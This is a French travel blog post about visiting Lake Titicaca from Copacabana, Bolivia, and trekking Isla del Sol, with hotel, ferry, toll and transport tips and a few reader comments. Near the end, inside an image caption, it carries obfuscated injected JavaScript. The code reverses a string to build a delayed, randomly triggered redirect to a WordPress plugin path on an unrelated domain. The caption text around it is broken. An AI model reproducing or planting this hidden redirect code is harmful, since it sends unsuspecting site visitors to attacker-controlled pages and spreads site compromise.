Le lac Titicaca est le plus haut lac navigable au monde, il est perché à plus de 3800m d’altitude. Nous en avons souvent rêvé et nous y sommes enfin. Avec une profondeur qui peut atteindre jusqu’à 280m, le lac Titicaca est le résultat d’un phénomène géologique situé en plein centre de l’altiplano. Plus de 25 cours d’eau l’alimentent et seul le Rio Desaguadé en découle. La Isla Del Sol est la plus grande île. Et oui, car ce lac aux faux airs de mer a bien des îles avec baies, îlots, plages et même îles flottantes. Pensez vous qu’il soit possible de faire de la plongée sous-marine dans le Lac Titicaca? Impossible is nothing, mais il vaut mieux qu’il fasse chaud. Apparemment un trésor Inca et même une ancienne ville Inca y seraient engloutis.

Une mer d’un bleu azur
Beaucoup nous ont conseillé le côté Bolivien, apparemment meilleur que le côté Péruvien. Nous décidons de prendre un bus direct de Cusco (Pérou) à Copacabana (Bolivie) sans nous arrêter à Puno (port principale du Lac Titicaca, coté Péruvien).
Pour nous amoureux de la mer et des océans, nous découvrons une mer perchée à 3800m d’altitude.

Vue sur la ville de Copacabana
Notre point d’entrée au Lac Titicaca est le village de Copacabana. Un joli village avec beaucoup de cafés et de restaurants à l’Européenne. Nous qui attendions des prix plus bas en Bolivie, c’est raté. A Copacabana, les prix sont similaires aux prix péruviens. Nous y resterons quand même 2 nuits pour s’acclimater avec l’altitude. Car malgré le fait de venir de Cusco à 3400m d’altitude, Copacabana est à 3800m! Figurez vous qu’avec seulement 400 mètres d’altitude de plus, j’aurais vécu le pire mal de crâne de tous les temps avec vomissements en prime. Le mal d’altitude est sérieux, il ne faut pas le prendre à la légère.
Nous nous installons pour notre premier coucher du soleil dans un restaurant en face du lac, les boissons y sont chères et la vue sur le lac est imprenable.

Quai d’embarquement vers isla del sol et la luna
Le lendemain, nous nous promenons dans la ville, la cathédrale, le marché, la « plage » et nous mangeons dans le marché (un menu local). Le soir nous irons nous mêler aux habitants de Copacabana, nous les regardons faire des affaires, vivre à la Bolivienne, d’autres regardent un match de foot et un magasin de faux DVD fait office de cinéma local. Nous regarderons ainsi dans la rue une sorte de film documentaire sur la vie des amazones, notre divertissement de la journée. C’était une expérience assez drôle.

Cathedrale de Copacabana
Le grand jour est arrivé, notre vrai rencontre avec le Lac Titicaca. Nous prenons le bateau pour la Isla Del Sol. Pour nous, c’est le diamant du lac Titicaca. Posée au milieu de cette mer, elle vous offre des vues plus époustouflantes les unes que les autres. La couleur du lac est parfois d’un bleu azur sur les bords des baies. Au large, la couleur de l’eau est bleue royale. Bref, les mots ne décrirons pas assez la beauté du paysage ni le sentiment que nous ressentons devant cette mer.
Pour découvrir la beauté du Lac Titicaca, nous avons opté pour un trek du nord au sud de la Isla Del Sol. Le chemin se nomme la route sacrée de l’éternité du soleil. Celui-ci est un sentier Inca. N’hésitez pas demander autour de vous. Voici une carte de l’île pour vous repérer. On vous indiquera gentiment le chemin à prendre (trek à péage). L’île est découpée en 3 communautés, Yamuni au Sud, Challa au centre et Challapampa au Nord. Les rentrées d’argent grâce aux péages vont directement aux communautés locales pour le développement des écoles, le nettoyage de l’île…
Nous entamons notre trek par le port nord, arrivés à 11h, nous commençons la marche par une plage très agréable. Je lance d’ailleurs le pari à toute personne qui oserait se baigner dans cette eau à 9 degrés. Nous passons la baignade et suivons la masse de touristes, certains avec guide d’autres sans. Si vous êtes intéressés par les services d’un guide, cela vous coûtera 10 Bolivianos (15 Dhs), ils sont disponibles à l’arrivée au port Nord. Une fois arrivés à la première porte, on vous demandera un boletto pour entrer dans la partie nord de l’île, celui-ci peut être acheté sur place ou au musée du village. Il vous coûtera 10 Bolivianos (15 Dhs).

Vue sur le lac titicaca Copacabana Isla Del Sol
Direction une petite montée puis une descente puis une montée, plus on monte, plus le paysage devient fou et magique. Nous sommes devant l’immensité du lac Titicaca et non d’une mer, difficile de concevoir que ce paysage puisse être des tonnes de litres d’eau douce. Nous arrivons enfin au point le plus au nord de l’île, des ruines Incas y sont délaissées. Rien de bien impressionnant comparé à ce qu’on a vu dans la vallée sacrée ou au Machu Picchu au Pérou. Le meilleur du trek reste à venir. En effet, lorsque nous entamons la montée des marches et celle des collines en direction du sud, nous découvrons le lac Titicaca d’une autre perspective plus en hauteur plus en profondeur.

Quelle vue incroyable, on se croirait en Grèce…
Nous apercevons Puno au loin, l’autre coté du Lac Titicaca, sommes nous de retour au Pérou? Non, mais la montre se règle automatiquement sur le fuseau horaire Péruvien.

Au nord de Isla Del Sol, au loin, vous pouvez voir Puno et le Pérou
Selon un vendeur dans une petite échoppe, les habitants du Lac Titicaca peuvent circuler librement d’un coté à un autre, ce ne sont pas des Péruviens ou des Boliviens, mais des habitants du Lac, pour eux les limites n’hésitent pas. En chiffre, 55% du lac Titicaca est Péruvien et 45% est Bolivien.

La route sacrée de l’éternité du soleil
La marche dure 3 heures, nous aurons passé plus de 6 heures à contempler et découvrir les nouveaux paysages qu’offre le lac Titicaca et surtout la Isla Del Sol. La beauté de cette nature est constamment changeante, elle se métamorphose en fonction de la lumière, des vents, des nuages… On ne se lasse pas de cette infinité d’eau qui nous intrigue. Nous sommes heureux d’avoir découvert la partie Bolivienne du Lac Titicaca, qui ne nous a absolument pas déçue, loin de la, elle nous a émerveillé et continuera à émerveiller ses visiteurs.
Une fois arrivés au village Yumani dans le sud de l’île, nous apercevons la majestueuse cordillère Royale qui surplombe le Lac Titicaca. Très belle manière de finir cette journée de découverte.

Coucher du soleil au Sud de Isla Del Sol
Où dormir dans le sud de la Isla Del Sol (Yumani)?
Comme à notre habitude, nous cherchons une chambre pour la nuit. Le village propose plusieurs types d’hôtels. Nous optons pour les moins chers, les chambres sont sommaires, certaines avec vue, d’autres pas mais le prix ne nous enchante peu. Par chance, nous rencontrons le gentil Leonardo (Tél: 730 511156) qui nous propose une chambre avec salle de bain privée pour 80 Bolivianos (120 Dhs/11Euros). Wow, c’est le prix que les autres hôtels proposent par personne. Allez on va voir ce que ça vaut. A notre grande surprise, c’est la chambre la plus propre de toutes et en prime une vue panoramique sur le lac Titicaca et la cordillère royale depuis le lit. (Suerte) L’hôtel s’appelle PACHAKUTI.

Nous recommandons cet hôtel pour sa propreté, son prix et sa vue
A l’heure de l’écriture, nous dînons dans un petit restaurant avec vue imprenable sur le lac Titicaca et le coucher du soleil.

Le meilleur bureau du monde, vue imprenable sur le lac Titicaca

Bonne nuit Isla Del Sol
Le réveil se fera en douceur, nous marcherons environ 20 minutes du haut de la communauté de Yumani de la Isla Del Sol vers le port. Sachez que vous descendez des escaliers Incas. Les paysages sont toujours époustouflants. On prendra le bateau de 10h30 du matin, retour à Copacabana où nous avons laissé nos sacs à dos.
Conseils:
- Pour cette sortie, n’oubliez surtout pas votre chapeau/casquette…, vêtement chaud + T-shirt et crème solaire. Nous sommes à 3800 m d’altitude. Le soleil tape fort et laisse des traces rouges.
- Toujours négocier les prix des auberges, de l’eau …
- Chargez votre téléphone et double batterie
- Apportez de l’eau de Copacabana et de quoi manger le midi. Tout est beaucoup plus cher sur l’île sauf les bananes 😀 (2 bananes pour 1 Boliviano)
- Ce trek est faisable en une journée sans guide, vous pouvez tout organiser vous même, c’est très facile.
- Une nuit sur l’île ne vous fera que du bien. C’est juste magique.
- Les toilettes sont disponibles à l’arrivée. Ne faites pas la même erreur que nous. Attendez votre tour car il n’y aura plus de toilettes sur tout le trek (La nature = WC , ne laissez pas vos papiers derrière vous par respect pour la nature)
- Faites une pause quand vous arrivez au Nord de la Isla Del Sol, cela vous permettra de vous reposer et surtout de laisser passer la vague de touristes arrivés en même temps. Vous pouvez ensuite avoir la beauté de la Isla Del Sol juste pour vous et prendre le temps de discuter avec les locaux (la plupart des touristes doivent reprendre le Ferry à 15h30 ou à 16h de Yamuni dans le Sud)
- Les locaux sont très ouverts à la conversation quelle qu’elle soit. Parlez leur, vous apprendrez beaucoup de choses de leurs vies et coutumes.

Un petit moment de partage…
- Vous devrez payer des péages sur le sentier Inca (du nord au sud), payez directement aux check points, ils sont bien indiqués par des pancartes.
- Prévoyez de la monnaie pour payer les différents bolettos des différentes communautés.
- Laissez vos valises/backpacks dans votre Hôtel à Copacabana (normalement le service est gratuit). Prenez que le nécessaire pour la journée et la nuit.
Comment arriver à Copacabana?
- Par Bus depuis le Pérou: Cusco(12h), Puno (3h), Arequipa ( h)
- Par bus depuis la Bolivie: La Paz (3h30, 20 Bolivianos en Minivan)
Comment quitter Copacabana?
- De Copacabana à La Paz: Des Minivans sont à disposition sur la place principale pour 20 Bolivianos/ 30Dhs/ 2.7Euros. Le trajet dure 3h30.
- De Copacabana à Sorata: Prenez un des minivans allant à La Paz et arrêtez vous à Huarina ou vous prendrez un minivan venant de La Paz en direction de Sorata. Comptez entre 4h de trajet.
- De Copacabana au Pérou: pas de problème les agences vous trouverons un bus pour votre destination finale (Puno, Cusco ou Arequipa).
Attention, comparez les prix des billets et n’hésitez pas à demander un Discuento (un rabais).
Voici les horaires pour quitter Copacabana.
Comment arriver/ quitter la Isla Del Sol?
Des ferrys super rapides (c’est une blague) sont disponibles à l’embarcadère, vous pouvez y acheter les billets directement avant le départ.
Il est important de savoir dans quel sens le trek sera fait (Nord vers le sud ou Inverse) car les ferrys ne sont pas disponibles vers toutes les directions toute la journée.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ur a Copacabana” width=”1024″ height=”681″ /> Retour a Copacabana
Horaire des ferrys pour la Isla Del Sol:
- Copacabana vers Isla Del Sol (Aller): 8h30 (Nord et Sud) 13h30 (Sud seulement)
- Isla Del Sol vers Copacabana (Retour): 10h30 Nord et Sud – 15h30 et 16h (Sud seulement)
Prix des Ferrys pour la Isla Del Sol:
- Prix A/R: 35 Bolivianos
- Un aller simple vers ou depuis la Isla Del Sol coûte 20 Bolivianos.
Les prix des péages à la Isla Del Sol:
Ce petit paradis à un petit prix mais 3 checks points où il faut payer un droit de passage dans une zone. Ce sentier autre fois Inca est devenu un trek à péage.
- 1er péage (Nord): 10 Bolivianos
- 2ème Paillage (Nord/Centre): 15 Bolivianos
- 3ème et dernier Paillage: 5 Bolivianos
Mais où va cet argent? Chaque communauté récolte les revenues de son péage et subventionne les écoles, les églises, la place centrale et les parties communes du village, afin de garder une île propre.
Nous sommes donc très content de pouvoir permettre aux habitants de la Isla Del Sol d’avoir un meilleur avenir.
Suivez-nous sur notre blog, notre page Facebook et notre page Instagram.
JerryPeps by AGBackpackers.com
Buhuhuh… moi aussi je veux du soleil 🙁 ! Les endroits que vous visitez sont toujours magnifiques. Pour la prochaine fois c’est à vous que je dois demander conseil 🙂 !
Répondre
On fera ça avec grand plaisir…
Nous n’avons pas que du Soleil. Les 2 derniers jours à Rurrenabaque, on a eu beaucoup de pluie mais bon on ne va pas s’en plaindre.
Répondre